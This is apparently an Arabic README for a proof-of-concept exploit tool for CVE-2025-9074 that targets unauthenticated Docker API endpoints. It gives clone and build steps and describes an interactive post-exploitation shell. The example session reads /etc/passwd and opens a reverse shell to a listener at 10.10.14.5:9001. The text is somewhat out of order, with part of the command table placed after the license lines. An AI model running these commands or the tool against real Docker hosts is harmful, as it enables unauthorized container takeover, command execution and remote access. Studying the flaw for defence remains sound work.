
Docker API CVE-2025-9074 PoC (إثبات المفهوم). إطار استغلال متطور لـ CVE-2025-9074، يستهدف نقاط نهاية Docker API غير الموثَّقة مع قشرة أوامر تفاعلية مدمجة.
إطار عمل متطور لاستغلال CVE-2025-9074، يستهدف نقاط نهاية Docker API غير الموثّقة مع صدفة أوامر تفاعلية مدمجة.
تعمل هذه الأداة على أتمتة استغلال مثيلات Docker API المكشوفة دون مصادقة، مما يتيح إنشاء حاويات كاملة وتنفيذ الأوامر على الجهاز المستهدف. تتميز الأداة بصدفة تفاعلية مخصصة لعمليات ما بعد الاستغلال بسلاسة.
ملاحظة: هذا تنفيذ PoC مخصص. لم أكتشف CVE-2025-9074.

اكتشاف تلقائي للثغرات، سحب الصور، إنشاء الحاويات وتهيئتها

صدفة ما بعد الاستغلال مع إمكانية تنفيذ الأوامر
git clone https://github.com/xwpdx0/poc-2025-9074
gcc poc.c -o poc-2025-9074
أو يمكنك تنزيل الملف التنفيذي من Releases
./poc-2025-9074
التنفيذ ضد الهدف الافتراضي (127.0.0.1:2375):
./poc-2025-9074
تحديد نقطة نهاية Docker API مخصصة:

بعد الاستغلال الناجح، توفّر صدفة تفاعلية الأوامر التالية:
| Command | Description |
|---|---|
cmd <command> | تنفيذ أوامر عشوائية داخل الحاوية |
revshell <ip> <port> | نشر قشرة عكسية إلى المستمع المحدد |
(PoC-CVE-2025-9074)> cmd whoami
(PoC-CVE-2025-9074)> cmd cat /etc/passwd
(PoC-CVE-2025-9074)> cmd ls -la /mnt
(PoC-CVE-2025-9074)> revshell 10.10.14.5 9001
(PoC-CVE-2025-9074)> info
تؤثر CVE-2025-9074 على مثيلات Docker التي تحتوي على نقاط نهاية API مكشوفة تفتقر إلى آليات مصادقة مناسبة. يسمح هذا التكوين الخاطئ بالوصول غير المصرح به إلى Docker daemon، مما يتيح:
هذه الأداة مقدمة لأغراض تعليمية واختبارات أمنية مصرح بها فقط.
xwpd (@xwpdx0)
رخصة MIT - راجع ملف LICENSE للتفاصيل
لأغراض الإفصاح المسؤول والبحث الأمني فقط.
info | عرض معلومات الحاوية والهدف الحالية |
exit | إنهاء الجلسة التفاعلية |